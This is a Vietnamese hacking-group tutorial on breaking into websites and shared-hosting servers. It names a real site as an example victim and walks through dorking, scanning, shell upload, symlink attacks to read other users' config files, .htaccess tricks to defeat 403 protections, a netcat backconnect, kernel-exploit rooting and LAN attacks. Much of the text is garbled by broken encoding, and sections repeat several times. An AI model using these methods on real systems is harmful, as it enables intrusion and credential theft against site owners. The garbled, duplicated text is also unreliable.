N?u nh� ta kh�ng �?c ��?c th? sao.Ta ph?i suy ngh? v? sao kh�ng �?c ��?c.T� duy �?t tr�?ng h?p ta v�o v? tr� admin c?a victim.N?u l� ta ,ta s? b?o m?t nh� th? n�o.S? l�m g?.T? �� ta c� nh?ng bi?n ph�p kh�c nhau.
Gi? s? nh� ta t?m gi?i ph�p �? bypass 403 forbidden error do ch? website �?t file .htaccess ch?ng h?n nh�.
Tr�n host ta �?t shell.T?o m?t th� m?c c� t�n l� VHBSYSTEM ch?ng h?n.��?ng d?n �?y �? c?a n� v� d? nh� sau : /home/attacker/public_html/VHBSYSTEM/ .Chmod l?i th� m?c n�y l� 777 (l�c �?u ch�a c?n.N?u kh�ng ��?c h?n th? ). Sau �� t?o m?t file .htaccess v?i n?i dung nh� sau
�?t file .htaccess n�y v�o th� m?c /home/attacker/public_html/ . N?u ta symlink file config v�o file vhb.txt v?i c?u tr�c l?nh ln -s /home/victim/public_html/includes/config.php vhb.txt
Th? sau khi symlink xong .Ta v�o th� m?c VHBSYSTEM v� �?c file vhb.txt v?a symlink v?.N� s? bypass ��?c.
��y ch? l� 1 v� d? trong nhi?u c�ch bypass.Nhi?u b?n b?o local ph?i c� t� duy.Nh�ng m?nh ngh? mu?n local t?t th? ph?i bi?t nhi?u c�ch bypass trong tr�?ng h?p kh�ng �?c ��?c file.
V?n �? n�y b?n n�n tham kh?o th�m ? nhi?u t�i li?u ��?c share trong VHB. ( ho?c gh� th�m vhbgr0up.blogspot.com )
Trong c�c c�ch c?ng ��?c kh� nhi?u ng�?i dung.Nh�ng d�ng symlink all config ( c�i n�y tr�n blog v� forum c?a vhb c?ng c� n�i r?i ). Sym root b?ng c�ch t?o sym root ? m?t server linux n�o �� .Sau �� tar l?i.Up l�n server c?n local.C�i n�y tr�n VHB c?ng nhi?u b�i n�i �?n r?i.
M?nh �? c?p th�m vi?c sym root ngay tr?c ti?p tr�n server.��i khi n� kh� hi?u qu? trong vi?c bypass security.
Nh� khi n?y.T?o m?t folder VHB �? ti?n x? l�.Link full c?a n� /home/attacker/public_html/VHB .Sau �� ta th?c hi?n symlink tr�n shell nh� sau " ln -s /root" . Sau �� ta ch?n m?t victim c� domain l� target.com ch?ng h?n.Ti?p t?c type "ls -la /etc/valiases/target.com" .Sau ddos quay l?i folder ta v?a t?o VHB.�?t v�o �?y 1 file htaccess c� n?i dung nh� sau
B�y gi? ta v�o xem ta symlink ��?c nh?ng g?.N?u nh� ch? n�o n� b�o permisssion access.Th? c?ng �?ng lo l?ng b?n t�m.H?y v�o s�u h�n.Gi? s? ta c?n xem target.com c� user l?y ��?c ? tr�n l� target �i.
Th? ta xem n� v?i link sau attacker.com/VHB/root/home/target/public_html/ ......
��i khi xem kh�ng ��?c th? c� th? view source l�n nh�.
Th�i d?ng ? vi?c local l?i.Kh�ng vi?t �?n khi n�o m?i xong.B?n c? l�?n tr�n blog VHB 1 tu?n.Ki?u g? ch? pro local :).
B�?c 5.Rooting.
N?u l� server linux th? n�n th? Get root n� .��i khi th? rooting server l?i l� con ��?ng ng?n h�n c? local sang.Kh�ng ph?i khi n�o c?ng local ��?c.N� b?o m?t b� �?o qu� th? c?ng ch?u ch?t th�i.H?y th? rooting n?u ��?c.
T?o m?t backconnect ho?c c� th? bind m?t port n�o ��.M?t back connect ? ��y l� server c� th? t? connect v? m?nh sau khi m?nh m? m?t port �?ng bi?t n�o �� v� l?ng nghe n� b?ng netcat ( nc -l -v -p 4444 ) ch?ng h?n.C� kh� nhi?u shell h? tr? back-connect..
Mu?n rooting th? ph?i ki?m tra xem kernel �� c� rooting ��?c hay kh�ng.Tr�n shell b?n c� th? ki?m tra b?ng l?n "uname -a" .L?y phi�n b?n c?a kernel nh�n ��?c .T?m tr�n google xem n� th? exploit �c hay kh�ng.
(C� th? v�o exploit-db.com/local/ ) �? t?m.
B�?c 6: Attack M?ng Lan.
N?u b?n �? chi?m �c 1 server m�y ch? r?i.Th? h?y c? g?ng th? t?n c�ng c�c m�y c�ng m?ng Lan v?i n�.��y l� c� h?i �? th? hi?n kh? n�ng attack trong m?ng Lan c?a b?n.C�i n�y khi n�o �?y b?o smod Hoangnhatnam c?a ch�ng ta demo.�? anh em m? m?t :))
iCarus - VHB Group
�i?u �?u ti�n m?nh mu?n n�i �� l� mu?n t?n c�ng 1 site.�i?u �?u ti�n b?n c?n c� �?y l� s? ki�n nh?n.C�p nh?t t?ng t� m?t.Kh�ng th? n�n n�ng m� b? qua nhi?u th�ng tin.D?n �?n gi?m hi?u qu?.Kh�ng ph?i website n�o t?n c�ng 1 ph�t c?ng l� ��?c ngay.Ch�nh v? th? n�n ph?i t�ch t?ng �i th�ng tin m?t.
N?u �? ki?m m?t site �? check ch�i th? t?t nh?t l� c�c b?n n�n d�ng c�c dork t?m c�c site c� l?i s?n.V� d? nh� c�c dork sqli .C�c dork c?a c�c phi�n b?n joomla ,vbulletin c� l?i.Nh� v?y s? hi?u qu? h�n l� t?m 1 site b?t k? r?i xem th? n� c� l?i kh�ng. (Ngo�i ra c?n c� m?t c�ch nhanh h�n n?a �� l� d�ng tool scan dork.N� s? t?m cho b?n m?t kh?i site b? l?i c� th? check ��?c t? m?t list dork c� s?n.C�i n�y hi?u qu? h�n cho d�n UG l�c t?m shop l?i.)
C?n n?u b?n mu?n t?n c�ng m?t website x�c �?nh.Th? vi?c n�y kh� h�n.Gi? s? victim c?a b?n c� domain l� target.com .�? t?n c�ng victim m?t c�ch hi?u qu?.(M?nh n�i ? ��y l� c? �?i v?i host share v� private.Site l?n c� b?o m?t t?t,l?n site nh?,forum. ) .
B�?c 1: L?y th�ng tin ban �?u.
L?y th�ng tin c?a victim .B?ng c�c whois n�.T?m hi?u c�ng nhi?u th�ng tin v? victim c�ng t?t.V� google ,bing ,yandex .... �?u l� c�c c�ng c? h?u �ch.M?nh khuy�n n�n th? v?i nhi?u c�ng c? t?m ki?m.V? b?n th�n thu?t to�n t?m ki?m c?a c�c c�ng c? n�y kh�c nhau n�n d?n �?n cho nhi?u k?t qu? v?i hi?u qu? kh�c nhau.
V� d? nh� nh?p v�o c�ng c? search nh� sau
ip:123.101.11.122 id=
N� s? cho ta m?t s? th�ng tin th� v?.B?n h?y c? g?ng thu th?p th�ng tin ban �?u c�ng nhi?u c�ng t?t.Ch? s? h?u domain.Admin c?a website.Support.K? c? s? �i?n tho?i , facebook,gmail ,yahoo, �?a ch? mail c?a c�ng ty.1 Attacker gi?i l� m?t attacker c� kh? n�ng t?n d?ng m?i s� h?.M?i �i?m y?u c� th? t?n c�ng.
B�?c 2 : Ph�n t�ch kh? n�ng t?n c�ng.
�?u ti�n l� n�n scan victim ch�nh.Scan victim ch�nh l� c�ng vi?c ch? �?o.�?i v?i site n?m trong server private c?a c�c c�ng ty l?n.Th? ��y l� b�?c ��ng vai tr? quy?t �?nh b?n c� th? attack ��?c n� hay kh�ng.
C�ng c? scan kh� nhi?u.M?nh gi?i thi?u b?n 1 s? b? nh� acunetix Vulnerablility Scanner . OpenVas (c?a backtrack ) , w3af ( c?a backtrack ) , nessus (c?a backtrack ), wpscan ( scan wordpress trong backtrack ) , joomlascan ( scan bug joomla trong backtrack , uniscan ( trong backtrack ) ... ng?i m� k? h?t c�c b? c�ng c? ch?c �?n s�ng mai.C�ng c? th? nhi?u nh�ng c�c b?n n�n ch?n l?a.�?i v?i victim n�o n�n d�ng b? n�o.V� n�n d�ng k?t h?p.V? nh� m?nh �? n�i.V?i m?i tool kh�c nhau n� d�ng c� ch? ,thu?t to�n scan kh�c nhau.N�n hi?u qu? n� c?ng kh�c nhau.T? k?t qu? scan ��?c.N� cho ta �?nh h?nh ph?i t?n c�ng nh� th? n�o.
Scan server.Scan l?y th�ng tin v? server.V� d? nh� xem server d�ng h? �i?u h�nh g?.S? d?ng Apache ,SII phi�n b?n bao nhi�u. ��?c vi?t tr�n ASP hay PHP .Port n�o m?.(�? scan port th? c� th? d�ng nmap.N� l� c�ng c? r?t hi?u qu?).
M?i th�ng tin v? phi�n b?n,port b?n h?y google ngay.Ho?c v�o exploit-db.com xem n� c� th? b? attack th�ng qua n� hay kh�ng.C?n kh�ng b?n c� th? l�u l?i th�ng tin.R?i sau �� ki?m tra 1 l?n xem sao.��y l� c�c b�?c r?t c?n thi?t �?i v?i vi?c t?n c�ng 1 website l?n.
�?i v?i Server share host.Ph�n t�ch kh? n�ng t?n c�ng .��y c?ng l� m?t b�?c r?t quan tr?ng.N� r�t ng?n th?i gian t?n c�ng c?a b?n.Nh�ng mang l?i hi?u qu? cao.
M?nh th?y �a s? (V� tr�?c ��y m?nh c?ng v?y ). �� l� �? t?n c�ng 1 website ko b? l?i ,Kh�ng c� l? h?ng.M?nh th�?ng reserve ip c?a server ch?a victim.R?i m? t?ng site check xem c� sqli hay kh�ng.
�?ng ? l� sqli r?t nhi?u.V� r?t d? khai th�c.Nh�ng kh�ng ph?i l�c n�o m?nh c?ng c� th? may m?n.Check 1 c�i l� ra link b? l?i ngay.N?u scan to�n b? site th? �?n bao gi? m?i xong.C� m?t c�ch r�t ng?n qu� tr?nh n�y �� l� x�c �?nh lo?i site c?n t?n c�ng.
M?nh v� d?.B?n c� kinh nghi?m v? check wordpress.B?n mu?n t?m c�c site trong server s? d�ng m? ngu?n n�y �? t?n c�ng.Sau �� local sang victim ch�nh.H?y d�ng google v?i dork l�
ip:112.78.2.247 "wordpress"
Nh� ��y m?nh nh?n ��?c m?t victim trong server n�y s? d?ng wordpresss http://www.saigoncanho.com.vn/
T��ng t? cho c�c m? ngu?n kh�c c?ng v?y.
B�?c 3: T?n c�ng.
��y l� b�?c nhi?u nh?t,Nh�ng m?nh n�i �t nh?t,v� n� c� qu� nhi?u ki?u t?n c�ng.Bi?t n�i th? n�o cho h?t ��?c.
Ch? ��c k?t m?t s? kinh nghi?m.V� d? nh� �?i v?i forum vbb ch?ng h?n.Nhi?u phi�n b?n th?c s? kh�ng c� bug.Nh�ng kh�ng ph?i v? th? m� ta b? qua.H?y xem c�c web application c?a n�.V� d? nh� c�c mod.�?i v?i joomla v� c�c m? ngu?n kh�c c?ng v?y.H?y xem c�ch extension �i theo.Ch�ng r?t hay b? l?i.B?i v? ��y �a s? l� c�c ?ng d?ng t�ch h?p ��?c vi?t b?i c�c web developer vi?t nam.Ch�ng r?t k�m trong vi?c b?o m?t.
T?n d?ng t?i �a k?t qu? m� c�c b?n scan ? tr�n.V� d? nh� b?n scan ��?c server d�ng apache 2.1 ch?ng h?n.H?y xem n� l� b?n update ch�a.N?u ch�a c� l?i �? khai th�c kh�ng.T?n c�ng v�o n�.Xem th�ng tin t? c�c l?i public tr�n google m� t?n c�ng.H?y c? g?ng t?n c�ng 1 c�ch t? t?.
Xem trong c?u tr�c site khi scan ��?c .Ch? n�o l� khai th�c ��?c.V� d? nh� ch�ng �? l?i database back up tr�n site ch?ng h?n.T?i v? v� ph�n t�ch ngay.
Nhi?u b? c�ng c? scan n� scan �?n t?ng l?i nh?.Nh� t?m v? tr� c� th? up ?nh, up file b?ng h?n.H?y c? bypass up shell th? xem.
? m?c n�y c� qu� nhi?u c�i �? n�i.V� th?c ch?t �a s? m?i tut hack th�?ng n�i v? ph?n n�y.N�n m?nh �? ph?n n�y cho c�c b?n.H?y c? g?ng t�ch h?p c�ng nhi?u kinh nghi?m ph?n n�y .C�ng nhi?u c�ng t?t.C�c ph?n kh�c n� �i theo 1 qui lu?t nh?t �?nh.C� th? �?i v?i victim n�o b?n c?ng l�m nh� th?.Nh�ng �?i v?i ph?n n�y.N� ph? thu?c v�o nhi?u th?.Ph? thu?c v�o k?t qu? scan ��?c.Ph? thu?c v�o nh?ng �?i t�?ng kh�c nhau.N�n n� r?t �a d?ng.
K?t qu? ? ph?n n�y.L� b?n c� th? c� ��?c t�i kho?n admin.Up ��?c shell.
B�?c 4: N?u t?n c�ng ��?c tr?c ti?p target r?i th? kh�ng n�i l�m g?.N?u t?n c�ng �c m?t site n?m c�ng server.Th? b�?c ti?p theo l� local.V? v?n �? local n�y c?ng kh� r?ng.M?nh ch? n�i qua m?t ph?n trong ��.
Trong local th? symlink l� m?t ki?u local ph? bi?n nh?t ,��?c d�ng nhi?u nh?t.N� nh� l� m?t shortcut b�n window.G�p ph?n l�m nhanh qu� tr?nh g?i ch?y m?t file.N?u nh� g?i tr?c ti?p hardlink th? qu� tr?nh h?at �?ng c?a server s? ch?m h?ng.
Trong ph��ng ph�p local.M?c ��ch ch�nh c?a ch�ng ta l� �?c / l?y c�c file config (ho?c 1 file config c?a target c?n t?n c�ng ). Vi?c th?c hi?n �?u ti�n l� ch�ng ta th�?ng �?c file /etc/passwd �? x�c �?nh t?t c? c�c user n?m trong server ( V� kh�ng ph?i server n�o c?ng cho ta th?c hi?n �c.Ph?i bypass ).
�? �?c file config ta c?n ph?i n?m c�c m? ngu?n.V?i m?i m? ngu?n kh�c nhau th? file config n� n?m ? m?t v? tr� kh�c nhau.
M?nh ��a ra m?t s? file config �?i v?i m?t s? m? ngu?n t��ng ?ng.
vBulletin : /includes/config.php
IPB : /conf_global.php
MyBB: /inc/config.php
Phpbb: /config.php
Php Nuke : /config.php
Php-Fusion : config.php
SMF : /Settings.php
Joomla : configuration.php
WordPress : /wp-config.php
Drupal: /sites/default/settings.php
Oscommerce: /includes/configure.php
T? ��y ta h?nh dung ��?c ��?ng d?n ch�nh x�c d?n �?n file config c?a victim.T? �� c� th? symlink ��?c ch�nh x�c file c?n �?c. (N?u nh� victim �?i v? tr� c?a file config.Th? ta ph?i ng?i symlink m?.Symlink t? index n�,�?n nh?ng file kh�c,xem n� include nh?ng file n�o .T? file n�y d? �?n file kia.�?i v?i m?t attacker kinh nghi?m.Th? vi?c b?o m?t b?ng c�ch gi?u file config c?a victim ��i khi kh�ng hi?u qu?.
C?u tr�c l?nh symlink (�? symlink file c� �?a ch? l� /home/usertarget/public_html/includes/config.php target.txt
l?nh n�y symlink file config v? file target.txt n?m ? th� m?c ta �ang symlink. ? �i?u ki?n t?t nh?t ta c� th? �?c �c file target.txt n�y tr�n host ta �?t shell.
Nh�ng kh�ng ph?i khi n�o ta c?ng c� �i?u ki?n t?t nh� v?y. Ch? c?a website c� th? chmod kh�ng cho ta �?c file config (100,101,400... ) ch?ng han.T�y server.Ho?c ch? website �?t t?i th� m?c ch?a file config �?y 1 file .htaccess c� n?i dung nh� sau.
<Files config.php>
order allow, deny
deny from all
</Files>
N?u ch? site �?c nh� th? th? khi symlink ta s? nh?n ��?c th�ng b�o l� 403 Forbidden Error.
? b�i n�y m?nh ch? n�i �?n t� t�?ng t?n c�ng ch? kh�ng n�i chi ti?t v? ph��ng ph�p t?n c�ng.N�n m?nh ch? n�u 1 v�i v� d?.
N?u nh� ta kh�ng �?c ��?c th? sao.Ta ph?i suy ngh? v? sao kh�ng �?c ��?c.T� duy �?t tr�?ng h?p ta v�o v? tr� admin c?a victim.N?u l� ta ,ta s? b?o m?t nh� th? n�o.S? l�m g?.T? �� ta c� nh?ng bi?n ph�p kh�c nhau.
Gi? s? nh� ta t?m gi?i ph�p �? bypass 403 forbidden error do ch? website �?t file .htaccess ch?ng h?n nh�.
Tr�n host ta �?t shell.T?o m?t th� m?c c� t�n l� VHBSYSTEM ch?ng h?n.��?ng d?n �?y �? c?a n� v� d? nh� sau : /home/attacker/public_html/VHBSYSTEM/ .Chmod l?i th� m?c n�y l� 777 (l�c �?u ch�a c?n.N?u kh�ng ��?c h?n th? ). Sau �� t?o m?t file .htaccess v?i n?i dung nh� sau
HeaderName vhb.txt
�?t file .htaccess n�y v�o th� m?c /home/attacker/public_html/ . N?u ta symlink file config v�o file vhb.txt v?i c?u tr�c l?nh ln -s /home/victim/public_html/includes/config.php vhb.txt
Th? sau khi symlink xong .Ta v�o th� m?c VHBSYSTEM v� �?c file vhb.txt v?a symlink v?.N� s? bypass ��?c.
��y ch? l� 1 v� d? trong nhi?u c�ch bypass.Nhi?u b?n b?o local ph?i c� t� duy.Nh�ng m?nh ngh? mu?n local t?t th? ph?i bi?t nhi?u c�ch bypass trong tr�?ng h?p kh�ng �?c ��?c file.
V?n �? n�y b?n n�n tham kh?o th�m ? nhi?u t�i li?u ��?c share trong VHB. ( ho?c gh� th�m vhbgr0up.blogspot.com )
Trong c�c c�ch c?ng ��?c kh� nhi?u ng�?i dung.Nh�ng d�ng symlink all config ( c�i n�y tr�n blog v� forum c?a vhb c?ng c� n�i r?i ). Sym root b?ng c�ch t?o sym root ? m?t server linux n�o �� .Sau �� tar l?i.Up l�n server c?n local.C�i n�y tr�n VHB c?ng nhi?u b�i n�i �?n r?i.
M?nh �? c?p th�m vi?c sym root ngay tr?c ti?p tr�n server.��i khi n� kh� hi?u qu? trong vi?c bypass security.
Nh� khi n?y.T?o m?t folder VHB �? ti?n x? l�.Link full c?a n� /home/attacker/public_html/VHB .Sau �� ta th?c hi?n symlink tr�n shell nh� sau " ln -s /root" . Sau �� ta ch?n m?t victim c� domain l� target.com ch?ng h?n.Ti?p t?c type "ls -la /etc/valiases/target.com" .Sau ddos quay l?i folder ta v?a t?o VHB.�?t v�o �?y 1 file htaccess c� n?i dung nh� sau
Options Indexes FollowSymLinks
DirectoryIndex index.htm
AddType txt .php
AddHandler txt .php
B�y gi? ta v�o xem ta symlink ��?c nh?ng g?.N?u nh� ch? n�o n� b�o permisssion access.Th? c?ng �?ng lo l?ng b?n t�m.H?y v�o s�u h�n.Gi? s? ta c?n xem target.com c� user l?y ��?c ? tr�n l� target �i.
Th? ta xem n� v?i link sau attacker.com/VHB/root/home/target/public_html/ ......
��i khi xem kh�ng ��?c th? c� th? view source l�n nh�.
Th�i d?ng ? vi?c local l?i.Kh�ng vi?t �?n khi n�o m?i xong.B?n c? l�?n tr�n blog VHB 1 tu?n.Ki?u g? ch? pro local :).
B�?c 5.Rooting.
N?u l� server linux th? n�n th? Get root n� .��i khi th? rooting server l?i l� con ��?ng ng?n h�n c? local sang.Kh�ng ph?i khi n�o c?ng local ��?c.N� b?o m?t b� �?o qu� th? c?ng ch?u ch?t th�i.H?y th? rooting n?u ��?c.
T?o m?t backconnect ho?c c� th? bind m?t port n�o ��.M?t back connect ? ��y l� server c� th? t? connect v? m?nh sau khi m?nh m? m?t port �?ng bi?t n�o �� v� l?ng nghe n� b?ng netcat ( nc -l -v -p 4444 ) ch?ng h?n.C� kh� nhi?u shell h? tr? back-connect..
Mu?n rooting th? ph?i ki?m tra xem kernel �� c� rooting ��?c hay kh�ng.Tr�n shell b?n c� th? ki?m tra b?ng l?n "uname -a" .L?y phi�n b?n c?a kernel nh�n ��?c .T?m tr�n google xem n� th? exploit �c hay kh�ng.
(C� th? v�o exploit-db.com/local/ ) �? t?m.
B�?c 6: Attack M?ng Lan.
N?u b?n �? chi?m �c 1 server m�y ch? r?i.Th? h?y c? g?ng th? t?n c�ng c�c m�y c�ng m?ng Lan v?i n�.��y l� c� h?i �? th? hi?n kh? n�ng attack trong m?ng Lan c?a b?n.C�i n�y khi n�o �?y b?o smod Hoangnhatnam c?a ch�ng ta demo.�? anh em m? m?t :))
iCarus - VHB Group
Tư duy - Phương hướng Attack Website - Server
newbie area vhb vhbTình hình là có khá nhiều bạn pm mình hỏi cách check site.Mà Mình cũng không có nhiều thời gian để chỉ từng bạn.Nên mình viết cái đường đi.Tư duy check site để các bạn đọc.Từ đó có một cái định hướng.Tự mình nghiên cứu.Thực hiện.
Điều đầu tiên mình muốn nói đó là muốn tấn công 1 site.Điều đầu tiên bạn cần có đấy là sự kiên nhẫn.Cóp nhặt từng tí một.Không thể nôn nóng mà bỏ qua nhiều thông tin.Dẫn đến giảm hiệu quả.Không phải website nào tấn công 1 phát cũng là được ngay.Chính vì thế nên phải tích từng đi thông tin một.
Nếu để kiếm một site để check chơi thì tốt nhất là các bạn nên dùng các dork tìm các site có lỗi sẵn.Ví dụ như các dork sqli .Các dork của các phiên bản joomla ,vbulletin có lỗi.Như vậy sẽ hiệu quả hơn là tìm 1 site bất kì rồi xem thử nó có lỗi không. (Ngoài ra còn có một cách nhanh hơn nữa đó là dùng tool scan dork.Nó sẽ tìm cho bạn một khối site bị lỗi có thể check được từ một list dork có sẵn.Cái này hiệu quả hơn cho dân UG lúc tìm shop lỗi.)
Còn nếu bạn muốn tấn công một website xác định.Thì việc này khó hơn.Giả sử victim của bạn có domain là target.com .Để tấn công victim một cách hiệu quả.(Mình nói ở đây là cả đối với host share và private.Site lớn có bảo mật tốt,lẫn site nhỏ,forum. ) .
Bước 1: Lấy thông tin ban đầu.
Lấy thông tin của victim .Bằng các whois nó.Tìm hiểu càng nhiều thông tin về victim càng tốt.Và google ,bing ,yandex .... đều là các công cụ hữu ích.Mình khuyên nên thử với nhiều công cụ tìm kiếm.Vì bản thân thuật toán tìm kiếm của các công cụ này khác nhau nên dẫn đến cho nhiều kết quả với hiệu quả khác nhau.
Ví dụ như nhập vào công cụ search như sau
Nó sẽ cho ta một số thông tin thú vị.Bạn hãy cố gắng thu thập thông tin ban đầu càng nhiều càng tốt.Chủ sở hữu domain.Admin của website.Support.Kể cả số điện thoại , facebook,gmail ,yahoo, địa chỉ mail của công ty.1 Attacker giỏi là một attacker có khả năng tận dụng mọi sơ hở.Mọi điểm yếu có thể tấn công.
Bước 2 : Phân tích khả năng tấn công.
Đầu tiên là nên scan victim chính.Scan victim chính là công việc chủ đạo.Đối với site nằm trong server private của các công ty lớn.Thì đây là bước đóng vai trò quyết định bạn có thể attack được nó hay không.
Công cụ scan khá nhiều.Mình giới thiệu bạn 1 số bộ như acunetix Vulnerablility Scanner . OpenVas (của backtrack ) , w3af ( của backtrack ) , nessus (của backtrack ), wpscan ( scan wordpress trong backtrack ) , joomlascan ( scan bug joomla trong backtrack , uniscan ( trong backtrack ) ... ngồi mà kể hết các bộ công cụ chắc đến sáng mai.Công cụ thì nhiều nhưng các bạn nên chọn lựa.Đối với victim nào nên dùng bộ nào.Và nên dùng kết hợp.Vì như mình đã nói.Với mỗi tool khác nhau nó dùng cơ chế ,thuật toán scan khác nhau.Nên hiệu quả nó cũng khác nhau.Từ kết quả scan được.Nó cho ta định hình phải tấn công như thế nào.
Scan server.Scan lấy thông tin về server.Ví dụ như xem server dùng hệ điều hành gì.Sử dụng Apache ,SII phiên bản bao nhiêu. Được viết trên ASP hay PHP .Port nào mở.(Để scan port thì có thể dùng nmap.Nó là công cụ rất hiệu quả).
Mọi thông tin về phiên bản,port bạn hãy google ngay.Hoặc vào exploit-db.com xem nó có thể bị attack thông qua nó hay không.Còn không bạn có thể lưu lại thông tin.Rồi sau đó kiểm tra 1 lần xem sao.Đây là các bước rất cần thiết đối với việc tấn công 1 website lớn.
Đối với Server share host.Phân tích khả năng tấn công .Đây cũng là một bước rất quan trọng.Nó rút ngắn thời gian tấn công của bạn.Nhưng mang lại hiệu quả cao.
Mình thấy đa số (Và trước đây mình cũng vậy ). Đó là để tấn công 1 website ko bị lỗi ,Không có lỗ hổng.Mình thường reserve ip của server chứa victim.Rồi mở từng site check xem có sqli hay không.
Đồng ý là sqli rất nhiều.Và rất dễ khai thác.Nhưng không phải lúc nào mình cũng có thể may mắn.Check 1 cái là ra link bị lỗi ngay.Nếu scan toàn bộ site thì đến bao giờ mới xong.Có một cách rút ngắn quá trình này đó là xác định loại site cần tấn công.
Mình ví dụ.Bạn có kinh nghiệm về check wordpress.Bạn muốn tìm các site trong server sử dùng mã nguồn này để tấn công.Sau đó local sang victim chính.Hãy dùng google với dork là
ip:112.78.2.247 "wordpress"
Như đây mình nhận được một victim trong server này sử dụng wordpresss http://www.saigoncanho.com.vn/
Tương tự cho các mã nguồn khác cũng vậy.
Bước 3: Tấn công.
Đây là bước nhiều nhất,Nhưng mình nói ít nhất,ví nó có quá nhiều kiểu tấn công.Biết nói thế nào cho hết được.
Chỉ đúc kết một số kinh nghiệm.Ví dụ như đối với forum vbb chẳng hạn.Nhiều phiên bản thực sự không có bug.Nhưng không phải vì thế mà ta bỏ qua.Hãy xem các web application của nó.Ví dụ như các mod.Đối với joomla và các mã nguồn khác cũng vậy.Hãy xem cách extension đi theo.Chúng rất hay bị lỗi.Bởi vì đây đa số là các ứng dụng tích hợp được viết bởi các web developer việt nam.Chúng rất kém trong việc bảo mật.
Tận dụng tối đa kết quả mà các bạn scan ở trên.Ví dụ như bạn scan được server dùng apache 2.1 chẳng hạn.Hãy xem nó là bản update chưa.Nếu chưa có lỗi để khai thác không.Tấn công vào nó.Xem thông tin từ các lỗi public trên google mà tấn công.Hãy cố gắng tấn công 1 cách từ từ.
Xem trong cấu trúc site khi scan được .Chỗ nào là khai thác được.Ví dụ như chúng để lại database back up trên site chẳng hạn.Tải về và phân tích ngay.
Nhiều bộ công cụ scan nó scan đến từng lỗi nhỏ.Như tìm vị trí có thể up ảnh, up file bẳng hạn.Hãy cố bypass up shell thử xem.
Ở mục này có quá nhiều cái để nói.Và thực chất đa số mọi tut hack thường nói về phần này.Nên mình để phần này cho các bạn.Hãy cố gắng tích hợp càng nhiều kinh nghiệm phần này .Càng nhiều càng tốt.Các phần khác nó đi theo 1 qui luật nhất định.Có thể đối với victim nào bạn cũng làm như thế.Nhưng đối với phần này.Nó phụ thuộc vào nhiều thứ.Phụ thuộc vào kết quả scan được.Phụ thuộc vào những đối tượng khác nhau.Nên nó rất đa dạng.
Kết quả ở phần này.Là bạn có thể có được tài khoản admin.Up được shell.
Bước 4: Nếu tấn công được trực tiếp target rồi thì không nói làm gì.Nếu tấn công đc một site nằm cùng server.Thì bước tiếp theo là local.Về vấn đề local này cũng khá rộng.Mình chỉ nói qua một phần trong đó.
Trong local thì symlink là một kiểu local phổ biến nhất ,Được dùng nhiều nhất.Nó như là một shortcut bên window.Góp phần làm nhanh quá trình gọi chạy một file.Nếu như gọi trực tiếp hardlink thì quá trình họat động của server sẽ chậm hẳng.
Trong phương pháp local.Mục đích chính của chúng ta là đọc / lấy các file config (hoặc 1 file config của target cần tấn công ). Việc thực hiện đầu tiên là chúng ta thường đọc file /etc/passwd để xác định tất cả các user nằm trong server ( Và không phải server nào cũng cho ta thực hiện đc.Phải bypass ).
Để đọc file config ta còn phải nắm các mã nguồn.Với mỗi mã nguồn khác nhau thì file config nó nằm ở một vị trí khác nhau.
Mình đưa ra một số file config đối với một số mã nguồn tương ứng.
Từ đây ta hình dung được đường dẫn chính xác dẫn đến file config của victim.Từ đó có thể symlink được chính xác file cần đọc. (Nếu như victim đổi vị trí của file config.Thì ta phải ngồi symlink mò.Symlink từ index nó,đến những file khác,xem nó include những file nào .Từ file này dò đến file kia.Đối với một attacker kinh nghiệm.Thì việc bảo mật bằng cách giấu file config của victim đôi khi không hiệu quả.
Cấu trúc lệnh symlink (để symlink file có địa chỉ là /home/usertarget/public_html/includes/config.php target.txt
lệnh này symlink file config về file target.txt nằm ở thư mục ta đang symlink. Ở điều kiện tốt nhất ta có thể đọc đc file target.txt này trên host ta đặt shell.
Nhưng không phải khi nào ta cũng có điều kiện tốt như vậy. Chủ của website có thể chmod không cho ta đọc file config (100,101,400... ) chẳng han.Tùy server.Hoặc chủ website đặt tại thư mục chứa file config đấy 1 file .htaccess có nội dung như sau.
Nếu chủ site đặc như thế thì khi symlink ta sẽ nhận được thông báo là 403 Forbidden Error.
Ở bài này mình chỉ nói đến tư tưởng tấn công chứ không nói chi tiết về phương pháp tấn công.Nên mình chỉ nêu 1 vài ví dụ.
Nếu như ta không đọc được thì sao.Ta phải suy nghĩ vì sao không đọc được.Tư duy đặt trường hợp ta vào vị trí admin của victim.Nếu là ta ,ta sẽ bảo mật như thế nào.Sẽ làm gì.Từ đó ta có những biện pháp khác nhau.
Giả sử như ta tìm giải pháp để bypass 403 forbidden error do chủ website đặt file .htaccess chẳng hạn nhé.
Trên host ta đặt shell.Tạo một thư mực có tên là VHBSYSTEM chẳng hạn.Đường dẫn đầy đủ của nó ví dụ như sau : /home/attacker/public_html/VHBSYSTEM/ .Chmod lại thư mục này là 777 (lúc đầu chưa cần.Nếu không được hẵn thử ). Sau đó tạo một file .htaccess với nội dung như sau
Đặt file .htaccess này vào thư mục /home/attacker/public_html/ . Nếu ta symlink file config vào file vhb.txt với cấu trúc lệnh ln -s /home/victim/public_html/includes/config.php vhb.txt
Thì sau khi symlink xong .Ta vào thư mục VHBSYSTEM và đọc file vhb.txt vừa symlink về.Nó sẽ bypass được.
Đây chỉ là 1 ví dụ trong nhiều cách bypass.Nhiều bạn bảo local phải có tư duy.Nhưng mình nghĩ muốn local tốt thì phải biết nhiều cách bypass trong trường hợp không đọc được file.
Vấn đề này bạn nên tham khảo thêm ở nhiều tài liệu được share trong VHB. ( hoặc ghé thăm vhbgr0up.blogspot.com )
Trong các cách cũng được khá nhiều người dung.Nhưng dùng symlink all config ( cái này trên blog và forum của vhb cũng có nói rồi ). Sym root bằng cách tạo sym root ở một server linux nào đó .Sau đó tar lại.Up lên server cần local.Cái này trên VHB cũng nhiều bài nói đến rồi.
Mình đề cập thêm việc sym root ngay trực tiếp trên server.Đôi khi nó khá hiệu quả trong việc bypass security.
Như khi nãy.Tạo một folder VHB để tiện xử lí.Link full của nó /home/attacker/public_html/VHB .Sau đó ta thực hiện symlink trên shell như sau " ln -s /root" . Sau đó ta chọn một victim có domain là target.com chẳng hạn.Tiếp tục type "ls -la /etc/valiases/target.com" .Sau ddos quay lại folder ta vừa tạo VHB.Đặt vào đấy 1 file htaccess có nội dung như sau
Bây giờ ta vào xem ta symlink được những gì.Nếu như chỗ nào nó báo permisssion access.Thì cũng đừng lo lắng bận tâm.Hãy vào sâu hơn.Giả sử ta cần xem target.com có user lấy được ở trên là target đi.
Thì ta xem nó với link sau attacker.com/VHB/root/home/target/public_html/ ......
Đôi khi xem không được thì có thể view source lên nhé.
